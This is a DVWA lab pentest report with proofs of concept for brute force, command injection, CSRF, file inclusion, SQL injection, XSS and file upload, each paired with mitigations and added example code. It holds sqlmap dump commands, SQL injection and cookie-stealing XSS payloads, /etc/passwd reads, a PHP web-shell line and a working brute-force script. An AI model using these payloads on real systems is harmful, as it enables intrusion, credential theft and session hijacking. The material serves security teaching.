
DVWA Pentesting Report

Introduction :-
Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is
deliberately vulnerable. Its main goals are to be an aid for security professionals to test
their skills and tools in a legal environment, to help web developers better understand the
process of securing web applications, and to aid teachers/students to teach/learn web
application security in a classroom environment. DVWA is a RandomStorm open-source
project. For further details about the services and products RandomStorm offers, please
visit http://www.randomstorm.com. The DVWA project started in December
2008 and has steadily grown in popularity. It is now used by thousands of security
professionals, students and teachers worldwide, and is included in popular penetration
testing Linux distributions such as the Samurai Web Testing Framework.

Vulnerabilities
DVWA, as the name suggests, is vulnerable to the most common types of web
application vulnerability. It incorporates most of the Open Web Application Security
Project's (OWASP) Top 10 web application security risks for 2010, as listed in the
OWASP Top 10 document:
https://owasp.org/www-pdf-archive/OWASP_Top_10_-_2010.pdf

The OWASP Top 10 Web Application Security Risks for 2010 are:
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards

Some of the web application vulnerabilities which DVWA contains:

 Brute Force: HTTP form brute-force login page; used to test password brute-force
tools and show the insecurity of weak passwords.
 Command Execution: Executes commands on the underlying operating system.
 Cross Site Request Forgery (CSRF): Enables an ‘attacker’ to change the
application's admin password.
 File Inclusion: Allows an ‘attacker’ to include remote/local files into the web
application.
 SQL Injection: Enables an ‘attacker’ to inject SQL statements into an HTTP form
input box. DVWA includes blind and error-based SQL injection.
 Insecure File Upload: Allows an ‘attacker’ to upload malicious files on to the web
server.
 Cross Site Scripting (XSS): An ‘attacker’ can inject their own scripts into the web
application/database. DVWA includes reflected and stored XSS.
 Easter eggs: Full path disclosure, authentication bypass and some others
(find them!).
POC-1:-

POC-2 (Brute Force)

 Intercepting the login request in Burp Suite shows the username and password
travelling as plain query parameters, so the request can be replayed once per entry of
a wordlist of likely passwords.
 The wordlist produced the username admin and password password; logging in
with these gives access.
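The loop described above, written out as an added example (this is not code from the original report or from DVWA): it builds the same GET request Burp captured, replays it once per wordlist entry, and stops at the first response carrying DVWA's success banner. The base URL and PHPSESSID are the ones quoted in this report; the wordlist and the two stand-in servers (one behaving like DVWA at level "low", one with a per-account lockout) are constructed here so the script can be exercised offline.

```python
# Added example, not DVWA's code: wordlist brute force of the DVWA "low"
# brute page, plus a lockout stand-in showing why the loop then fails.
import urllib.parse
import urllib.request

BASE = "http://192.168.234.134/dvwa"  # from the report; assumed reachable
COOKIE = "security=low; PHPSESSID=63716ffe56fb72a5741e454e725bceca"  # from the report
SUCCESS_MARK = "Welcome to the password protected area"  # DVWA's success banner
WORDLIST = ["123456", "qwerty", "letmein", "admin", "password", "dvwa"]  # constructed


def build_url(username, password):
    """The GET request DVWA's low-level brute page accepts (the one Burp captures)."""
    query = urllib.parse.urlencode(
        {"username": username, "password": password, "Login": "Login"})
    return BASE + "/vulnerabilities/brute/?" + query


def http_get(url, cookie=COOKIE):
    """Real transport: replay the request with the captured session cookie."""
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def brute_force(username, wordlist, send=http_get):
    """Try each candidate; return (password, attempts) or (None, attempts)."""
    for attempts, candidate in enumerate(wordlist, start=1):
        body = send(build_url(username, candidate))
        if SUCCESS_MARK in body:
            return candidate, attempts
    return None, len(wordlist)


def _params(url):
    q = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    return q.get("username", [""])[0], q.get("password", [""])[0]


def fake_dvwa(url):
    """Constructed stand-in for DVWA low: unlimited attempts, admin/password works."""
    user, password = _params(url)
    if (user, password) == ("admin", "password"):
        return "<p>" + SUCCESS_MARK + "</p>"
    return "<pre><br />Username and/or password incorrect.</pre>"


def make_locking_server(max_failures=3):
    """Constructed stand-in with the 'limit failed login attempts' mitigation:
    after max_failures wrong guesses the account stops answering at all."""
    failures = {}

    def send(url):
        user, _ = _params(url)
        if failures.get(user, 0) >= max_failures:
            return "<p>Account locked. Try again later.</p>"
        body = fake_dvwa(url)
        if SUCCESS_MARK not in body:
            failures[user] = failures.get(user, 0) + 1
        return body

    return send


if __name__ == "__main__":
    print("no lockout:  ", brute_force("admin", WORDLIST, send=fake_dvwa))
    print("with lockout:", brute_force("admin", WORDLIST, send=make_locking_server()))
```

Against the real target, call brute_force("admin", wordlist) with the default transport; the lockout variant shows that the same loop exhausts the wordlist without ever reaching the correct entry once three wrong guesses have been made.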

MITIGATIONS (Brute Force):-
 Utilize or require strong passwords
 Limit the number of failed login attempts per account and lock or delay further
attempts once it is reached
 Set time delays between attempts (rate limiting)
 Employ the use of CAPTCHAs

POC-3 (Command Execution):-

The page takes an IP address to ping and hands it to the operating system shell, so any
further shell commands supplied in the same field are executed as well. From here the
server's directories can be listed.
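For the command execution page (POC-3), the pattern behind it and its fix, as an added example that is not DVWA's own code: DVWA concatenates the submitted address into a ping command for the shell; here "echo" stands in for "ping -c 4" so the example runs without network access, and the hardened handler (IP-literal validation plus an argv list with no shell) is this example's, not the project's.

```python
# Added example, not DVWA's code: shell command injection via string
# concatenation, beside the argv-list and input-validation fix.
import ipaddress
import subprocess


def run_vulnerable(target):
    """String concatenation + shell=True: metacharacters in `target` are
    interpreted by /bin/sh, exactly as in the low-level DVWA page."""
    cmd = "echo pinging " + target  # "echo" stands in for "ping -c 4"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(target):
    """Same command passed as an argv list: no shell parses the input, so
    ';' and '&&' reach echo as ordinary characters of one argument."""
    proc = subprocess.run(["echo", "pinging", target], capture_output=True, text=True)
    return proc.stdout


def validate_ip(target):
    """Allowlist by type: only a syntactically valid IPv4/IPv6 literal passes;
    ipaddress raises ValueError for anything else."""
    return str(ipaddress.ip_address(target.strip()))


def run_safe(target):
    """Hardened handler: validate first, then run with argv and no shell."""
    return run_argv(validate_ip(target))


if __name__ == "__main__":
    print(run_vulnerable("127.0.0.1; echo INJECTED"))  # second command runs
    print(run_argv("127.0.0.1; echo INJECTED"))        # printed, not executed
    print(run_safe("127.0.0.1"))
```

Either layer alone already stops the injection; the validation step additionally rejects the input early with a clear error instead of passing junk to the command.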

POC-4 Cross Site Request Forgery (CSRF)

The password-change form submits the new password by GET with nothing that ties the
request to the user who filled in the form, so the following URL is sufficient:

http://192.168.234.134/dvwa/vulnerabilities/csrf/?
password_new=yuvi&password_conf=yuvi&Change=Change

Pasting the URL into the browser of a logged-in user (or making their browser fetch it
from another page) changes the password to yuvi.
MITIGATION:-
 Synchronizer tokens (a per-session secret embedded in the form and checked on
every state-changing request)
 Double-submit cookies
 SameSite cookies
 Requiring user interaction (re-authentication or confirmation) for sensitive changes
 Custom request headers
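The request above, the one-line page an attacker would host to fire it with the victim's cookies, and a synchronizer-token check that rejects it, as an added example (not the report's or DVWA's code). The session dictionary, handler shape and messages are this example's assumptions; the user_token field name mirrors DVWA's own token parameter.

```python
# Added example, not DVWA's code: CSRF trigger page and a synchronizer-token
# check on the password-change handler.
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

TARGET = ("http://192.168.234.134/dvwa/vulnerabilities/csrf/"
          "?password_new=yuvi&password_conf=yuvi&Change=Change")  # from the report


def attacker_page(url):
    """What the victim has to load: the browser fetches `url` and attaches the
    DVWA session cookie by itself, so the state change succeeds silently."""
    return '<img src="%s" width="0" height="0" alt="">' % url


def issue_token(session):
    """Mint a per-session token to embed in the legitimate form."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def change_password(session, url):
    """Hardened handler: refuse any state change whose token does not match
    the one stored in the session (constant-time compare)."""
    q = parse_qs(urlsplit(url).query)

    def field(name):
        return q.get(name, [""])[0]

    expected = session.get("csrf_token", "")
    submitted = field("user_token")
    if not expected or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "CSRF token is incorrect"
    if not field("password_new") or field("password_new") != field("password_conf"):
        return 400, "Passwords did not match."
    session["password"] = field("password_new")
    return 200, "Password Changed."


def legitimate_form(session, new_password):
    """The request the real page would send: same endpoint plus the token."""
    token = issue_token(session)
    return (TARGET.split("?")[0]
            + "?password_new=%s&password_conf=%s&Change=Change&user_token=%s"
            % (new_password, new_password, token))


if __name__ == "__main__":
    victim = {"password": "password"}
    print(attacker_page(TARGET))
    print(change_password(victim, TARGET))                       # forged: rejected
    print(change_password(victim, legitimate_form(victim, "yuvi")))  # genuine: accepted
```

The attacker's page cannot read the token out of the victim's session, so the forged request arrives without it (or with a guess) and is refused before any change is made.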

POC-5 File Inclusion:- go to File Inclusion

The page includes whatever file is named in the page parameter of the URL. Changing
that value to /etc/passwd makes the application include and display the system password
file.

MITIGATION
 ID assignment – store file paths in a secure database and give each one an ID, so
users only ever submit an ID and never see or alter a path
 Whitelisting – keep a fixed list of the files that may be included and reject
everything else
 Use databases – do not serve includable files from a directory on the web server
that can be compromised; keep the content in a database instead
 Better server instructions – have the server send download headers automatically
instead of executing files in a specified directory
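The first two mitigations (ID assignment and whitelisting), together with the containment check most people reach for first, as an added example that is not DVWA's code. BASE_DIR, the page list and the ID table are assumptions; the test values are the report's /etc/passwd plus two common variants, and the example shows why the containment check alone is not sufficient.

```python
# Added example, not DVWA's code: page-selection logic for a file inclusion
# endpoint, with a broken filter, a containment check, an allowlist and an
# ID table, exercised against the report's /etc/passwd value.
import posixpath

BASE_DIR = "/var/www/html/dvwa/vulnerabilities/fi"  # assumed install path
ALLOWED_PAGES = ("include.php", "file1.php", "file2.php", "file3.php")  # assumed allowlist
PAGE_IDS = {1: "file1.php", 2: "file2.php", 3: "file3.php"}  # assumed ID table


def naive_filter(page):
    """A common but broken defence: delete '../' once. Doubling the sequence
    survives the pass and traverses anyway."""
    return page.replace("../", "")


def stays_in_base(page):
    """Containment check: resolve the value against BASE_DIR and require the
    result to remain below it. Catches traversal and absolute paths, but a
    URL such as http://... still looks like a local path to this test."""
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, page))
    return resolved.startswith(BASE_DIR + "/")


def resolve_allowlisted(page):
    """Whitelisting: only a fixed set of file names is ever included."""
    if page not in ALLOWED_PAGES:
        raise ValueError("page not allowed: %r" % page)
    return posixpath.join(BASE_DIR, page)


def resolve_by_id(page_id):
    """ID assignment: the client sends a number, the server owns the path."""
    try:
        return posixpath.join(BASE_DIR, PAGE_IDS[int(page_id)])
    except (KeyError, ValueError):
        raise ValueError("unknown page id: %r" % page_id)


if __name__ == "__main__":
    print(naive_filter("....//....//etc/passwd"))      # still traverses
    print(stays_in_base("/etc/passwd"))                  # False
    print(stays_in_base("http://evil.example/shell.txt"))  # True: not enough
    print(resolve_by_id("2"))
```

The allowlist or ID table is the real control; the containment check is useful as defence in depth when file names genuinely must come from the client, but it says nothing about remote wrappers, which only a fixed list rejects.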
POC-6 SQL Injection :-
 The User ID field is placed directly into a SQL query, so any SQL typed into it is
executed and the results reveal sensitive information held in the database.
 Running ' OR ''=' makes the WHERE clause always true and returns every user:

 Running ' or 1=2 union select user, password from users# appends a second
query and returns the list of password hashes. DVWA stores unsalted MD5 hashes,
which are easily cracked with a wordlist or a lookup table to recover the passwords.
MITIGATION
 Use parameterized queries (prepared statements) so input is bound as data and
never concatenated into SQL
 Restrict database code (no dynamic SQL built from strings)
 Restrict database access (a least-privilege account for the application)
 Maintain applications and databases (patching)
 Monitor application and database inputs and communications

POC-7 Blind SQL Injection:-

Submitting "1" on the blind SQL injection page and capturing the request in Burp Suite
gives the target URL and the cookies (security level and PHPSESSID) that sqlmap needs,
so the extraction is run from Kali with sqlmap:

sqlmap -u "http://192.168.234.134/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=63716ffe56fb72a5741e454e725bceca" --dbs

This enumerates the databases. The hashes and passwords are then dumped from the
users table of the dvwa database:

sqlmap -u "http://192.168.234.134/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=63716ffe56fb72a5741e454e725bceca" -D dvwa -T users -C user,password --dump

MITIGATION
 Use parameterized queries to ensure that user input cannot interfere with the
structure of the intended SQL query.
 Stop writing dynamic queries with string concatenation; avoid dynamic SQL
wherever possible, whatever the language.
 Filter inputs, restrict database code and database access, and keep the
application and database maintained and monitored, as for POC-6.
POC-8 Reflected XSS

Typing an ordinary name into the form simply echoes it back in the page. Submitting a
script in place of the name executes it in the browser; the pop-up proves the injection:
<script>alert("you are hacker")</script>

 Running this script instead displays the session cookie, which can be used for
session hijacking:
<script>alert(document.cookie)</script>
IMPACT:- Reflected cross-site scripting is relatively complex to exploit, as the malicious
payload has to be sent as part of a URL and the user has to be tricked into visiting that
URL. However, it has the same impact as a persistent XSS. In the DVWA application, XSS
can be used to hijack a victim's session and thereby gain complete access to his/her user
account. Additionally, it can be used to redirect the victim to a malicious website that may
contain browser exploits or a phishing page.
MITIGATIONS:-
 Encode all user-supplied data for the context it is written into (HTML-entity
encode it before placing it inside HTML) so it is displayed rather than executed.
 Validate all user-supplied input on the server against the type and characters
expected.
 Set the HttpOnly flag on the session cookie so script cannot read it, and deploy a
Content-Security-Policy that disallows inline scripts.
 Use a maintained HTML sanitizer library where rich HTML input must be accepted.
 Use a web application firewall (WAF) to block abnormal requests as an additional
layer.
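The reflected sink behind the xss_r page re-created next to the output encoding that neutralises the report's payload, and the cookie flag that keeps document.cookie from exposing PHPSESSID even when a script does run, as an added example (not DVWA's code). The helper names and cookie value are this example's assumptions; the page path and the echo pattern are DVWA's.

```python
# Added example, not DVWA's code: reflected XSS sink, output encoding fix,
# and an HttpOnly session cookie.
import html
from urllib.parse import quote

PAGE = "http://192.168.234.134/dvwa/vulnerabilities/xss_r/"  # DVWA's reflected XSS page
PAYLOAD = "<script>alert(document.cookie)</script>"  # from the report


def poc_url(payload):
    """The link a victim has to be tricked into opening."""
    return PAGE + "?name=" + quote(payload, safe="")


def render_vulnerable(name):
    """DVWA low: echo '<pre>Hello ' . $_GET['name'] . '</pre>'."""
    return "<pre>Hello " + name + "</pre>"


def render_encoded(name):
    """Mitigation: HTML-encode at the point of output so '<' becomes '&lt;'
    and the browser shows the payload as text instead of running it."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"


def reflects_unencoded(render, payload):
    """Quick check a tester can run: does the raw payload come back intact?"""
    return payload in render(payload)


def session_cookie(session_id):
    """HttpOnly: the browser withholds the cookie from script, so the report's
    alert(document.cookie) no longer reveals the session id; SameSite also
    narrows the CSRF surface seen in POC-4."""
    return "PHPSESSID=%s; Path=/; HttpOnly; SameSite=Lax" % session_id


if __name__ == "__main__":
    print(poc_url(PAYLOAD))
    print(render_vulnerable(PAYLOAD))
    print(render_encoded(PAYLOAD))
    print(session_cookie("63716ffe56fb72a5741e454e725bceca"))
```

Encoding belongs at the output side, in the template, not in a filter applied to the input on its way in: the same name may later be written into a JavaScript string or an attribute, each of which needs its own encoding.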
POC-9 FILE UPLOAD VULNERABILITY :-
The upload page accepts any file type and, after the upload, displays the path where the
file was stored on the server, which an attacker should never be told.

Copying that path into the URL reaches the uploaded file directly.

Because the uploaded file was a PHP script taking a cmd parameter, browsing to it as
.php?cmd=cat+/etc/passwd runs the command on the server and returns the password
file.
MITIGATION
 Allow only certain file extensions (an allowlist of image types, checked
case-insensitively) and verify that the content matches the extension
 Set a maximum file size and name length
 Allow only authorized users to upload
 Store uploads under a server-chosen name, outside the web root or in a directory
where scripts are never executed, and do not disclose the stored path
 Keep your website updated
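Server-side validation for an upload handler that applies the mitigations listed above, as an added example (not DVWA's code; its low-level page applies none of these checks). The limits, the extension allowlist and the sample files are this example's own choices, constructed inline, and each rejection reason names the trick it stops, from the plain .php of the POC to a double extension and a GIF header with PHP behind it.

```python
# Added example, not DVWA's code: allowlist, size, magic-byte and content
# checks for an upload handler, with a server-chosen stored name.
import os
import secrets

ALLOWED = {  # extension -> magic bytes the content must start with
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_SIZE = 100_000  # bytes; assumed limit
MAX_NAME = 64       # characters; assumed limit

# Constructed sample files
PNG_FILE = ALLOWED["png"] + b"\x00" * 32
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"  # the kind of file the POC uploads
GIF_SHELL = b"GIF89a" + PHP_SHELL             # valid image header, PHP inside


def validate_upload(filename, data):
    """Return (stored_name, reason); stored_name is None when rejected."""
    name = os.path.basename(filename.replace("\\", "/"))  # drop any client path
    if not name or len(name) > MAX_NAME:
        return None, "bad name length"
    if len(data) > MAX_SIZE:
        return None, "too large"
    if name.count(".") != 1:
        return None, "exactly one extension required"  # stops shell.php.jpg, shell.jpg.php
    ext = name.rsplit(".", 1)[1].lower()  # case-insensitive: shell.PHP is still php
    if ext not in ALLOWED:
        return None, "extension not allowed"
    if not data.startswith(ALLOWED[ext]):
        return None, "content does not match extension"
    if b"<?php" in data or b"<?=" in data:
        return None, "embedded PHP"  # polyglot such as a GIF carrying a web shell
    # Server-chosen name: the client never learns or controls the stored path.
    return secrets.token_hex(16) + "." + ext, "ok"


if __name__ == "__main__":
    for fname, blob in [("cat.png", PNG_FILE), ("shell.php", PHP_SHELL),
                        ("shell.php.jpg", PHP_SHELL), ("shell.jpg", PHP_SHELL),
                        ("shell.gif", GIF_SHELL)]:
        print(fname, "->", validate_upload(fname, blob))
```

The embedded-PHP scan is a heuristic, not the control: what actually keeps a polyglot harmless is serving the upload directory without script execution (or from outside the web root), which is why that bullet is listed above alongside the validation rules.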
